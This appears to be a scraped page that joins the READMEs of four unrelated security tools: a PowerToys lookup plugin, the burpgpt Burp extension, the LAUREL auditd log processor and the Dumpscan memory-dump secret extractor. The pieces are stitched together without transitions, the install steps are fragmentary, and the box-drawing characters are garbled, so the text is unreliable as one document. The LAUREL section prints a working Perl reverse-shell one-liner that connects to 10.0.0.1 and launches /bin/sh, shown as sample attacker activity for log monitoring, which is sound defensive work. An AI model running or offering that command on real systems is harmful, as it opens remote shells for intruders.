This plugin for PowerToys Run allows you to quickly search for an IP address, domain name, hash or any other data points in a list of Cyber Security tools. It's perfect for security analysts, penetration testers, or anyone else who needs to quickly lookup information when investigating artifacts or alerts.
To install the plugin:
C:\Program Files\PowerToys\modules\launcher\Plugins
C:\Users\<yourusername>\AppData\Local\PowerToys\modules\launcher\Plugins
ql
To use the plugin, simply open PowerToys Run by pressing Alt+Space and type the activation command ql
followed by the tool category and the data you want to lookup.
The plugin will open the data searched in a new tab in your default browser for each tool registered with that category.
This plugin currently comes default with the following tools:
NOTE: Prior to version 1.3.0
tools.conf
was the default configuration file used.The plugin will now automatically convert the
tools.conf
list totools.json
if it does not already exist in JSON form and will then default to using that instead.
The legacy config file will remain however will not be used and will not be included in future builds starting from v1.3.0
By default, the plugin will use the precofigured tools listed above. You can modify these settings by editing the tools.json
file in the plugin folder.
The format for the configuration file follows the below standard:
{
"Name": "VirusTotal",
"URL": "https://www.virustotal.com/gui/search/{0}",
"Categories": [ "ip", "domain", "hash"],
"Enabled": true
}
In the URL, {0}
will be replace with the search input. As such, only sites that work based on URL data (GET Requests) are supported for now.
For example, https://www.virustotal.com/gui/search/{0}
would become https://www.virustotal.com/gui/search/1.1.1.1
burpgpt
leverages the power of AI
to detect security vulnerabilities that traditional scanners might miss. It sends web traffic to an OpenAI
model
specified by the user, enabling sophisticated analysis within the passive scanner. This extension offers customisable prompts
that enable tailored web traffic analysis to meet the specific needs of each user. Check out the Example Use Cases section for inspiration.
The extension generates an automated security report that summarises potential security issues based on the user's prompt
and real-time data from Burp
-issued requests. By leveraging AI
and natural language processing, the extension streamlines the security assessment process and provides security professionals with a higher-level overview of the scanned application or endpoint. This enables them to more easily identify potential security issues and prioritise their analysis, while also covering a larger potential attack surface.
[!WARNING] Data traffic is sent to
OpenAI
for analysis. If you have concerns about this or are using the extension for security-critical applications, it is important to carefully consider this and review OpenAI's Privacy Policy for further information.
[!WARNING] While the report is automated, it still requires triaging and post-processing by security professionals, as it may contain false positives.
[!WARNING] The effectiveness of this extension is heavily reliant on the quality and precision of the prompts created by the user for the selected
GPT
model. This targeted approach will help ensure theGPT model
generates accurate and valuable results for your security analysis.
ย
passive scan check
, allowing users to submit HTTP
data to an OpenAI
-controlled GPT model
for analysis through a placeholder
system.OpenAI's GPT models
to conduct comprehensive traffic analysis, enabling detection of various issues beyond just security vulnerabilities in scanned applications.GPT tokens
used in the analysis by allowing for precise adjustments of the maximum prompt length
.OpenAI models
to choose from, allowing them to select the one that best suits their needs.prompts
and unleash limitless possibilities for interacting with OpenAI models
. Browse through the Example Use Cases for inspiration.Burp Suite
, providing all native features for pre- and post-processing, including displaying analysis results directly within the Burp UI for efficient analysis.Burp Event Log
, enabling users to quickly resolve communication issues with the OpenAI API
.Operating System: Compatible with Linux
, macOS
, and Windows
operating systems.
Java Development Kit (JDK): Version 11
or later.
Burp Suite Professional or Community Edition: Version 2023.3.2
or later.
[!IMPORTANT] Please note that using any version lower than
2023.3.2
may result in a java.lang.NoSuchMethodError. It is crucial to use the specified version or a more recent one to avoid this issue.
Version 6.9
or later (recommended). The build.gradle file is provided in the project repository.JAVA_HOME
environment variable to point to the JDK installation directory.Please ensure that all system requirements, including a compatible version of Burp Suite
, are met before building and running the project. Note that the project's external dependencies will be automatically managed and installed by Gradle
during the build process. Adhering to the requirements will help avoid potential issues and reduce the need for opening new issues in the project repository.
Ensure you have Gradle installed and configured.
Download the burpgpt
repository:
git clone https://github.com/aress31/burpgpt
cd .\burpgpt\
Build the standalone jar
:
./gradlew shadowJar
Burp Suite
To install burpgpt
in Burp Suite
, first go to the Extensions
tab and click on the Add
button. Then, select the burpgpt-all
jar file located in the .\lib\build\libs
folder to load the extension.
To start using burpgpt, users need to complete the following steps in the Settings panel, which can be accessed from the Burp Suite menu bar:
OpenAI API key
.model
.max prompt size
. This field controls the maximum prompt
length sent to OpenAI
to avoid exceeding the maxTokens
of GPT
models (typically around 2048
for GPT-3
).Once configured as outlined above, the Burp passive scanner
sends each request to the chosen OpenAI model
via the OpenAI API
for analysis, producing Informational
-level severity findings based on the results.
burpgpt
enables users to tailor the prompt
for traffic analysis using a placeholder
system. To include relevant information, we recommend using these placeholders
, which the extension handles directly, allowing dynamic insertion of specific values into the prompt
:
Placeholder | Description |
---|---|
{REQUEST} | The scanned request. |
{URL} | The URL of the scanned request. |
{METHOD} | The HTTP request method used in the scanned request. |
{REQUEST_HEADERS} | The headers of the scanned request. |
{REQUEST_BODY} | The body of the scanned request. |
{RESPONSE} | The scanned response. |
{RESPONSE_HEADERS} | The headers of the scanned response. |
{RESPONSE_BODY} | The body of the scanned response. |
{IS_TRUNCATED_PROMPT} | A boolean value that is programmatically set to true or false to indicate whether the prompt was truncated to the Maximum Prompt Size defined in the Settings . |
These placeholders
can be used in the custom prompt
to dynamically generate a request/response analysis prompt
that is specific to the scanned request.
[!NOTE] >
Burp Suite
provides the capability to support arbitraryplaceholders
through the use of Session handling rules or extensions such as Custom Parameter Handler, allowing for even greater customisation of theprompts
.
The following list of example use cases showcases the bespoke and highly customisable nature of burpgpt
, which enables users to tailor their web traffic analysis to meet their specific needs.
Identifying potential vulnerabilities in web applications that use a crypto library affected by a specific CVE:
Analyse the request and response data for potential security vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER}:
Web Application URL: {URL}
Crypto Library Name: {CRYPTO_LIBRARY_NAME}
CVE Number: CVE-{CVE_NUMBER}
Request Headers: {REQUEST_HEADERS}
Response Headers: {RESPONSE_HEADERS}
Request Body: {REQUEST_BODY}
Response Body: {RESPONSE_BODY}
Identify any potential vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER} in the request and response data and report them.
Scanning for vulnerabilities in web applications that use biometric authentication by analysing request and response data related to the authentication process:
Analyse the request and response data for potential security vulnerabilities related to the biometric authentication process:
Web Application URL: {URL}
Biometric Authentication Request Headers: {REQUEST_HEADERS}
Biometric Authentication Response Headers: {RESPONSE_HEADERS}
Biometric Authentication Request Body: {REQUEST_BODY}
Biometric Authentication Response Body: {RESPONSE_BODY}
Identify any potential vulnerabilities related to the biometric authentication process in the request and response data and report them.
Analysing the request and response data exchanged between serverless functions for potential security vulnerabilities:
Analyse the request and response data exchanged between serverless functions for potential security vulnerabilities:
Serverless Function A URL: {URL}
Serverless Function B URL: {URL}
Serverless Function A Request Headers: {REQUEST_HEADERS}
Serverless Function B Response Headers: {RESPONSE_HEADERS}
Serverless Function A Request Body: {REQUEST_BODY}
Serverless Function B Response Body: {RESPONSE_BODY}
Identify any potential vulnerabilities in the data exchanged between the two serverless functions and report them.
Analysing the request and response data for potential security vulnerabilities specific to a Single-Page Application (SPA) framework:
Analyse the request and response data for potential security vulnerabilities specific to the {SPA_FRAMEWORK_NAME} SPA framework:
Web Application URL: {URL}
SPA Framework Name: {SPA_FRAMEWORK_NAME}
Request Headers: {REQUEST_HEADERS}
Response Headers: {RESPONSE_HEADERS}
Request Body: {REQUEST_BODY}
Response Body: {RESPONSE_BODY}
Identify any potential vulnerabilities related to the {SPA_FRAMEWORK_NAME} SPA framework in the request and response data and report them.
Settings
panel that allows users to set the maxTokens
limit for requests, thereby limiting the request size.AI model
, allowing users to run and interact with the model on their local machines, potentially improving response times and data privacy.maxTokens
value for each model
to transmit the maximum allowable data and obtain the most extensive GPT
response possible.Burp Suite
restarts.GPT
responses into the Vulnerability model
for improved reporting.The extension is currently under development and we welcome feedback, comments, and contributions to make it even better.
If this extension has saved you time and hassle during a security assessment, consider showing some love by sponsoring a cup of coffee
for the developer. It's the fuel that powers development, after all. Just hit that shiny Sponsor button at the top of the page or click here to contribute and keep the caffeine flowing.Did you find a bug? Well, don't just let it crawl around! Let's squash it together like a couple of bug whisperers!
Please report any issues on the GitHub issues tracker. Together, we'll make this extension as reliable as a cockroach surviving a nuclear apocalypse!
Looking to make a splash with your mad coding skills?
Awesome! Contributions are welcome and greatly appreciated. Please submit all PRs on the GitHub pull requests tracker. Together we can make this extension even more amazing!
See LICENSE.
LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.
TLDR: Instead of audit events that look like thisโฆ
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742โฆ
โฆturn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:
{ โฆ "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, โฆ}
This happens at the source. The generated event even contains useful information about the spawning process:
"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH
and EXECVE
elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.
LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).
Refer to JSON-based log format for a description of the log format.
We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.
A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event record are not suppressed, so rules like
-a always,exclude -F msgtype=EOE
should be removed.
Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id
points to the message corresponding to the last execve
syscall for this process:
"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}
Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as keys to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.
Consider the following rule that set keys for apt and dpkg invocations:
-w /usr/bin/apt-get -p x -k software_mgmt
Let's configure LAUREL to turn the software_mgmt
key into a process label that is propagated to child processes:
apt-get
and its subprocesses to be labelled software_mgmt
. For example, running sudo apt-get update
on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_gmt
can be observed in LAUREL's audit log:
apt-get update
/usr/bin/dpkg --print-foreign-architectures
/usr/lib/apt/methods/http
/usr/lib/apt/methods/https
/usr/lib/apt/methods/https
/usr/lib/apt/methods/http
/usr/lib/apt/methods/gpgv
/usr/lib/apt/methods/gpgv
/usr/bin/dpkg --print-foreign-architectures
/usr/bin/dpkg --print-foreign-architectures
This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.
See INSTALL.md.
GNU General Public License, version 3
The logo was created by Birgit Meyer <hello@biggi.io>.
Dumpscan is a command-line tool designed to extract and dump secrets from kernel and Windows Minidump formats. Kernel-dump parsing is provided by volatility3.
Note: Testing has only been performed on Windows 10 and 11 64-bit hosts and processes. Feel free to file an issue for additional versions. Linux testing TBD.
As a command-line tool, installation is recommended using pipx. This allows for easy updates and well and ensuring it is installed in its own virtual environment.
pipx install dumpscan
pipx inject dumpscan git+https://github.com/volatilityfoundation/volatility3#39e812a
Usage: dumpscan [OPTIONS] COMMAND [ARGS]...
Scan memory dumps for secrets and keys
โญโ Options โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ โ
โ --help Show this message and exit. │ ;
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โญโ Commands โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ โ
โ kernel Scan kernel dump using volatility โ
โ minidump Scan a user-mode minidump โ
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
In the case for subcommands that extract certificates, you can provide --output/-o <dir>
to output any discovered certificates to disk.
As mentioned, kernel analysis is performed by Volatility3. cmdline
, envar
, and pslist
are direct calls to the Volatility3 plugins, while symcrypt
and x509
are custom plugins.
Usage: dumpscan kernel [OPTIONS] COMMAND [ARGS]...
Scan kernel dump using volatility
โญโ Options โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ โ
โ --help Show this message and exit. โฐ
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โญโ Commands โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ โ
โ cmdline List command line for processes (Only for Windows) โ
โ envar List process environment variables (Only for Windows) โ
โ pslist List all the processes and their command lin e arguments โ
โ symcrypt Scan a kernel-mode dump for symcrypt objects โ
โ x509 Scan a kernel-mode dump for x509 certificates โ
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
Supports Windows Minidump format.
Note: This has only been tested on 64-bit processes on Windows 10+. 32-bit processes requires additional work but isn't a priority.
Usage: dumpscan minidump [OPTIONS] COMMAND [ARGS]...
Scan a user-mode minidump
โญโ Options โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ โ
โ --help Show this message and exit. โ
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โญโ Commands โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ โ
โ cmdline Dump the command line string โ
โ envar Dump the environment variables in a minidump โ
โ symcrypt Scan a minidump for symcrypt objects โ
โ x509 Scan a minidump for x509 objects โ
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
construct
for parsing minidumps.